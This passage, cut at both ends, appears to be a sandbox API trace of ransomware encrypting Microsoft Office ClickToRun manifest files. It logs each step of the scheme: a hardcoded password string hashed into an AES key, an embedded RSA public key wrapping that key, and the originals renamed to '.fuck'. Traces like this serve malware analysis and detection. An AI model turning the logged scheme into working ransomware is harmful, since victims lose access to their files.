Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office32mui.msi.16.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.office32mui.msi.16.en-us.xml.gsg")) returned 0 [0239.239] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office32mui.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.office32mui.msi.16.en-us.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office32mui.msi.16.en-us.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.office32mui.msi.16.en-us.xml.fuck")) returned 0 [0239.240] CryptDestroyHash (hHash=0x2893b70) returned 1 [0239.240] CryptDestroyKey (hKey=0x2893fb0) returned 1 [0239.240] CryptReleaseContext (hProv=0x28aaa68, dwFlags=0x0) returned 1 [0239.240] FindNextFileA (in: hFindFile=0x2893cf0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.240] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0239.240] GetLastError () returned 0x5 [0239.240] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office32ww.msi.16.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.office32ww.msi.16.x-none.xml")) returned 0x20 [0239.240] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office32ww.msi.16.x-none.xml", dwFileAttributes=0x80) returned 0 [0239.241] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office32ww.msi.16.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.office32ww.msi.16.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.241] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office32ww.msi.16.x-none.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.office32ww.msi.16.x-none.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.242] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office32ww.msi.16.x-none.xml.gsg", dwFileAttributes=0x2) returned 0 [0239.242] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28ab150) returned 1 [0239.245] CryptCreateHash (in: hProv=0x28ab150, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0239.245] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.245] CryptHashData (hHash=0x2893b70, pbData=0x2885188, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.245] CryptDeriveKey (in: hProv=0x28ab150, Algid=0x6610, hBaseData=0x2893b70, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2893fb0) returned 1 [0239.246] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.246] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0239.246] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28aaa68) returned 1 [0239.246] CryptImportPublicKeyInfo (in: hCryptProv=0x28aaa68, dwCertEncodingType=0x1, pInfo=0x2898550*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2898580*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2898588*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x2894570) returned 1 [0239.246] CryptEncrypt (in: hKey=0x2894570, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0239.246] CryptEncrypt (in: hKey=0x2894570, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28abe10*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28abe10*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0239.247] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28abe10, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.247] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0239.247] CryptEncrypt (in: hKey=0x2893fb0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0239.247] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.247] CloseHandle (hObject=0xffffffff) returned 1 [0239.247] CloseHandle (hObject=0xffffffff) returned 1 [0239.247] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office32ww.msi.16.x-none.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.office32ww.msi.16.x-none.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office32ww.msi.16.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.office32ww.msi.16.x-none.xml"), bFailIfExists=0) returned 0 [0239.247] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office32ww.msi.16.x-none.xml", dwFileAttributes=0x0) returned 0 [0239.248] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office32ww.msi.16.x-none.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.office32ww.msi.16.x-none.xml.gsg")) returned 0 [0239.248] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office32ww.msi.16.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.office32ww.msi.16.x-none.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office32ww.msi.16.x-none.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.office32ww.msi.16.x-none.xml.fuck")) returned 0 [0239.249] CryptDestroyHash (hHash=0x2893b70) returned 1 [0239.249] CryptDestroyKey (hKey=0x2893fb0) returned 1 [0239.249] CryptReleaseContext (hProv=0x28ab150, dwFlags=0x0) returned 1 [0239.249] FindNextFileA (in: hFindFile=0x2893cf0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.249] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0239.249] GetLastError () returned 0x5 [0239.249] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemui.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.officemui.msi.16.en-us.xml")) returned 0x20 [0239.249] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemui.msi.16.en-us.xml", dwFileAttributes=0x80) returned 0 [0239.250] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemui.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.officemui.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.250] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemui.msi.16.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.officemui.msi.16.en-us.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.251] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemui.msi.16.en-us.xml.gsg", dwFileAttributes=0x2) returned 0 [0239.251] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28aa518) returned 1 [0239.254] CryptCreateHash (in: hProv=0x28aa518, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0239.254] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.254] CryptHashData (hHash=0x2893b70, pbData=0x2884fa8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.254] CryptDeriveKey (in: hProv=0x28aa518, Algid=0x6610, hBaseData=0x2893b70, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2893fb0) returned 1 [0239.254] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.254] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0239.254] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28ac250) returned 1 [0239.255] CryptImportPublicKeyInfo (in: hCryptProv=0x28ac250, dwCertEncodingType=0x1, pInfo=0x2897c60*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2897c90*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2897c98*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x28947b0) returned 1 [0239.255] CryptEncrypt (in: hKey=0x28947b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0239.255] CryptEncrypt (in: hKey=0x28947b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28ab9d0*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28ab9d0*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0239.255] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28ab9d0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.255] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0239.255] CryptEncrypt (in: hKey=0x2893fb0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0239.255] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.255] CloseHandle (hObject=0xffffffff) returned 1 [0239.255] CloseHandle (hObject=0xffffffff) returned 1 [0239.255] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemui.msi.16.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.officemui.msi.16.en-us.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemui.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.officemui.msi.16.en-us.xml"), bFailIfExists=0) returned 0 [0239.256] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemui.msi.16.en-us.xml", dwFileAttributes=0x0) returned 0 [0239.257] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemui.msi.16.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.officemui.msi.16.en-us.xml.gsg")) returned 0 [0239.257] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemui.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.officemui.msi.16.en-us.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemui.msi.16.en-us.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.officemui.msi.16.en-us.xml.fuck")) returned 0 [0239.258] CryptDestroyHash (hHash=0x2893b70) returned 1 [0239.258] CryptDestroyKey (hKey=0x2893fb0) returned 1 [0239.258] CryptReleaseContext (hProv=0x28aa518, dwFlags=0x0) returned 1 [0239.258] FindNextFileA (in: hFindFile=0x2893cf0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.258] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0239.258] GetLastError () returned 0x5 [0239.258] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemuiset.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.officemuiset.msi.16.en-us.xml")) returned 0x20 [0239.259] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemuiset.msi.16.en-us.xml", dwFileAttributes=0x80) returned 0 [0239.260] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemuiset.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.officemuiset.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.260] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemuiset.msi.16.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.officemuiset.msi.16.en-us.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.261] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemuiset.msi.16.en-us.xml.gsg", dwFileAttributes=0x2) returned 0 [0239.262] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28aa7c0) returned 1 [0239.264] CryptCreateHash (in: hProv=0x28aa7c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0239.264] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.264] CryptHashData (hHash=0x2893b70, pbData=0x2884b48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.264] CryptDeriveKey (in: hProv=0x28aa7c0, Algid=0x6610, hBaseData=0x2893b70, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2893fb0) returned 1 [0239.265] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.265] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0239.265] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28ab948) returned 1 [0239.265] CryptImportPublicKeyInfo (in: hCryptProv=0x28ab948, dwCertEncodingType=0x1, pInfo=0x2898a30*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2898a60*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2898a68*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x2894730) returned 1 [0239.265] CryptEncrypt (in: hKey=0x2894730, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0239.265] CryptEncrypt (in: hKey=0x2894730, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28abd00*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28abd00*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0239.265] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28abd00, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.266] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0239.266] CryptEncrypt (in: hKey=0x2893fb0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0239.266] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.266] CloseHandle (hObject=0xffffffff) returned 1 [0239.266] CloseHandle (hObject=0xffffffff) returned 1 [0239.266] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemuiset.msi.16.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.officemuiset.msi.16.en-us.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemuiset.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.officemuiset.msi.16.en-us.xml"), bFailIfExists=0) returned 0 [0239.266] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemuiset.msi.16.en-us.xml", dwFileAttributes=0x0) returned 0 [0239.267] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemuiset.msi.16.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.officemuiset.msi.16.en-us.xml.gsg")) returned 0 [0239.267] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemuiset.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.officemuiset.msi.16.en-us.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemuiset.msi.16.en-us.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.officemuiset.msi.16.en-us.xml.fuck")) returned 0 [0239.268] CryptDestroyHash (hHash=0x2893b70) returned 1 [0239.268] CryptDestroyKey (hKey=0x2893fb0) returned 1 [0239.268] CryptReleaseContext (hProv=0x28aa7c0, dwFlags=0x0) returned 1 [0239.268] FindNextFileA (in: hFindFile=0x2893cf0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.268] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0239.268] GetLastError () returned 0x5 [0239.268] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.onenote.onenote.x-none.msi.16.x-none.xml")) returned 0x20 [0239.269] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml", dwFileAttributes=0x80) returned 0 [0239.269] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml" (normalized: "c:\\users\\all 